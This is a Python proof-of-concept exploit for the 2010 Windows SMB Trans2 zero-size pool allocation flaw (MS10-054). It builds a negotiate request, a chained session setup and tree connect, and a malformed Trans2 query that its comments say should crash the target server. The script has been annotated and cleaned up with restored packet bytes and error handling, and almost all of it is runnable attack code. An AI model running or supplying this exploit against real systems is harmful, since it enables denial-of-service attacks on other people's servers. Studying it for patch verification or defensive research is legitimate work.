# Title : Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
# Published : 2010-08-10
# Author : Laurent Gaffie
#!/usr/bin/env python
import sys,struct,socket
from socket import *
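# Command-line prelude: TARGET and SHARE-NAME are both required.
# This script deliberately crashes a vulnerable SMB server (MS10-054, a
# denial-of-service PoC) -- only point it at systems you are explicitly
# authorised to test.
if len(sys.argv) <= 2:
    print('#######################################################################')
    print('# MS10-054 Proof Of Concept by Laurent Gaffie')
    print('# Usage: python ' + sys.argv[0] + ' TARGET SHARE-NAME (No backslash)')
    print('# Example: python ' + sys.argv[0] + ' 192.168.8.101 users')
    print('# http://g-laurent.blogspot.com/')
    print('# http://twitter.com/laurentgaffie')
    print('# Email: laurent.gaffie{at}gmail{dot}com')
    # "\n\n" restored: the original text had lost its backslashes.
    print('#######################################################################\n\n')
    # Usage error: exit non-zero so wrappers/scripts can detect it.
    sys.exit(1)

# (TARGET, 445): SMB over TCP.  argv entries are already str, no str() needed.
host = (sys.argv[1], 445)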
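# SMB_COM_NEGOTIATE (0x72) request, NetBIOS-framed.  The original listing had
# lost every backslash ("x00x00..."), which would have sent literal ASCII; the
# packet is rebuilt here from its fields so the bytes are both correct and
# readable.  Layout of the 158-byte result:
#   [0:4]   NetBIOS session header: type 0x00, 154 (0x9a) bytes follow
#   [4:36]  32-byte SMB header: "\xffSMB", command 0x72, NT status 0, flags 0,
#           flags2 0, PIDHigh 0, 8-byte signature 0, reserved 0, TID 0,
#           PID 0x15c3, UID 0, MID 0x3d01 (multi-byte fields little-endian)
#   [36]    WordCount 0
#   [37:39] ByteCount 0x0077 (119), little-endian
#   [39:]   dialect list, each entry 0x02 + NUL-terminated ASCII name
_NEGOTIATE_DIALECTS = (
    b"PC NETWORK PROGRAM 1.0",
    b"MICROSOFT NETWORKS 3.0",
    b"DOS LM1.2X002",
    b"DOS LANMAN2.1",
    b"Windows for Workgroups 3.1a",
    b"NT LM 0.12",
)
_negotiate_body = (
    b"\xff\x53\x4d\x42"                      # "\xffSMB" protocol id
    b"\x72"                                  # command: SMB_COM_NEGOTIATE
    b"\x00\x00\x00\x00"                      # NT status
    b"\x00"                                  # flags
    b"\x00\x00"                              # flags2
    b"\x00\x00"                              # PID high
    b"\x00\x00\x00\x00\x00\x00\x00\x00"      # security signature (unsigned)
    b"\x00\x00"                              # reserved
    b"\x00\x00"                              # TID
    b"\xc3\x15"                              # PID = 0x15c3
    b"\x00\x00"                              # UID
    b"\x01\x3d"                              # MID = 0x3d01
    b"\x00"                                  # WordCount
    b"\x77\x00"                              # ByteCount = 119
) + b"".join(b"\x02" + name + b"\x00" for name in _NEGOTIATE_DIALECTS)
# 4-byte big-endian NetBIOS length prefix, computed rather than hard-coded.
packetnego = struct.pack(">I", len(_negotiate_body)) + _negotiate_body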
def tidpiduidfield(data):
    """Return the six bytes carrying TID, PID and UID from a received SMB reply.

    ``data`` is the raw reply including its 4-byte NetBIOS session header, so
    the SMB header starts at offset 4 and the TID/PID/UID fields (2 bytes
    each) occupy offsets 28-33.  The caller splices this slice into the next
    request so the server sees the identifiers it just handed out.

    No length check is performed: a reply shorter than 34 bytes yields a
    shorter (possibly empty) slice, exactly like the original.
    """
    start, stop = 28, 34
    return data[start:stop]
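def handle(data, share=None):
    """Build the next request for the SMB reply ``data``, or None.

    Dispatches on the two bytes at ``data[8:10]``: the command byte that the
    server echoes back, followed by the first byte of the NT status (0x00 for
    success).  ``data`` includes the 4-byte NetBIOS header, so the SMB header
    starts at offset 4.

    * reply to NEGOTIATE (0x72): returns a NetBIOS-framed SESSION_SETUP_ANDX
      chained with TREE_CONNECT_ANDX for the given share.
    * reply to SESSION_SETUP_ANDX (0x73): returns the malformed TRANS2
      QUERY_FS_INFORMATION request that triggers MS10-054, reusing the
      TID/PID/UID from the reply.
    * anything else, including an empty or truncated reply: returns None.

    ``share`` defaults to ``sys.argv[2]`` (the original behaviour); pass it
    explicitly when calling from outside the script.  ``str`` values are
    encoded to bytes.

    Every packet literal below was restored from an extraction that had lost
    its backslashes ("x00x00...") and would otherwise have sent literal ASCII.
    """
    if share is None:
        share = sys.argv[2]
    if not isinstance(share, bytes):
        share = share.encode()

    ## Chained SMB commands: Session Setup AndX request + Tree Connect AndX
    if data[8:10] == b"\x72\x00":
        # NOTE(review): kept byte-for-byte from the original PoC.  The path has
        # three leading backslashes and no server name, and the ByteCount low
        # byte written below is len(share_path) -- one more than the bytes that
        # actually follow it (its two leading NULs double as the ByteCount high
        # byte and the 1-byte password).  Confirm against a live target before
        # "correcting" either.
        share_path = (b"\x00\x00\x5c\x5c\x5c" + share
                      + b"\x00\x3f\x3f\x3f\x3f\x3f\x00")
        # Original: struct.pack(">i", len)[3:4], i.e. the low byte only.
        bytecount_lo = struct.pack("B", len(share_path) & 0xff)

        # SMB header: command 0x73, flags 0x10, PID 0x15d5, UID 1, MID 0x2f81.
        header = (
            b"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"
        )
        # SESSION_SETUP_ANDX words: WordCount 13, AndXCommand 0x75
        # (TREE_CONNECT_ANDX), AndXOffset 0x7a (=122, where the tree-connect
        # block starts), MaxBuffer 0x0b68, MaxMpx 50, VcNumber 0, SessionKey 0,
        # ANSI password length 24, Unicode password length 0, reserved,
        # Capabilities 4, ByteCount 0x3d (61).
        session_words = (
            b"\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
            b"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00"
        )
        # 61 data bytes: 24-byte ANSI "password", account, domain, OS, LANMAN.
        session_bytes = (
            b"\x01" * 24
            + b"YO\x00"
            + b"WORKGROUP\x00"
            + b"Windows 4.0\x00"
            + b"Windows 4.0\x00"
        )
        # TREE_CONNECT_ANDX: WordCount 4, AndXCommand 0xff (none), reserved,
        # AndXOffset 0, Flags 0, PasswordLength 1.
        tree_words = b"\x04\xff\x00\x00\x00\x00\x00\x01\x00"

        packetsession = (header + session_words + session_bytes
                         + tree_words + bytecount_lo + share_path)
        print("[+]Session Query sent")
        # Big-endian 4-byte NetBIOS length prefix.
        return struct.pack(">i", len(packetsession)) + packetsession

    ## Trans2 request, QUERY_FS_INFORMATION, level SMB_QUERY_FS_ATTRIBUTE_INFO
    if data[8:10] == b"\x73\x00":
        # NetBIOS length 0x46 (70) is fixed because every field below is.
        packetrans = (
            b"\x00\x00\x00\x46"
            # SMB header: command 0x32 (TRANS2), flags2 0xc801, then the
            # TID/PID/UID the server assigned, then MID 0x0013.
            b"\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00"
            + tidpiduidfield(data)
            + b"\x13\x00"
            # TRANS2 words: WordCount 15, TotalParamCount 2, TotalDataCount 0,
            # MaxParamCount 0, MaxDataCount 0 (presumably the zero-size pool
            # allocation the advisory title refers to), MaxSetupCount 0,
            # reserved, Flags 0, Timeout 0, reserved, ParamCount 2,
            # ParamOffset 68, DataCount 0, DataOffset 70, SetupCount 1,
            # reserved, Setup[0] 0x0003 (QUERY_FS_INFORMATION), ByteCount 5.
            + b"\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
            # ByteCount high byte, pad, two bytes kept as in the original, then
            # the 2-byte parameter at offset 68: InformationLevel 0x0105.
            b"\x00\x00\x44\x20\x05\x01"
        )
        # "\n" restored from the garbled original.
        print("[+]Malformed Trans2 packet sent\n[+]The target should be down now")
        return packetrans

    # Unrecognised reply (or nothing at all): the caller should stop.
    return None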
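def run():
    """Drive the three-packet exchange against ``host`` and report progress.

    Sends ``packetnego``, then answers each server reply with whatever
    ``handle`` returns, until the server stops replying (a crash, a timeout
    or a closed connection) or ``handle`` has nothing further to send.

    Differences from the original loop, which swallowed every exception:
    the 2-second timeout is set before connect() so a dead host fails fast,
    sendall() is used so partial sends cannot truncate a packet, an empty
    recv() (peer closed) and an unrecognised reply both end the loop
    explicitly, socket errors are printed, and the socket is always closed.
    """
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(2)  # covers connect() and every recv()/send() below
    try:
        s.connect(host)
        s.sendall(packetnego)
        print("[+]Negotiate Protocol Request sent")
        while True:
            data = s.recv(1024)
            if not data:
                # Orderly close by the peer (or the crash we just provoked).
                print("[*]Connection closed by target")
                break
            reply = handle(data)
            if reply is None:
                # Original would have passed None to send() and silently died.
                print("[-]Unexpected reply (command byte %r); stopping" % data[8:9])
                break
            s.sendall(reply)
    except (IOError, OSError) as exc:
        # socket.error / socket.timeout derive from these on Python 2 and 3.
        # After the Trans2 packet a silent target is the expected outcome,
        # so this is informational rather than fatal.
        print("[*]Socket error or timeout: %s" % exc)
    finally:
        s.close()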
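# Only fire when executed as a script, so importing the module (e.g. to reuse
# handle()/packetnego) does not launch the attack.
if __name__ == "__main__":
    run()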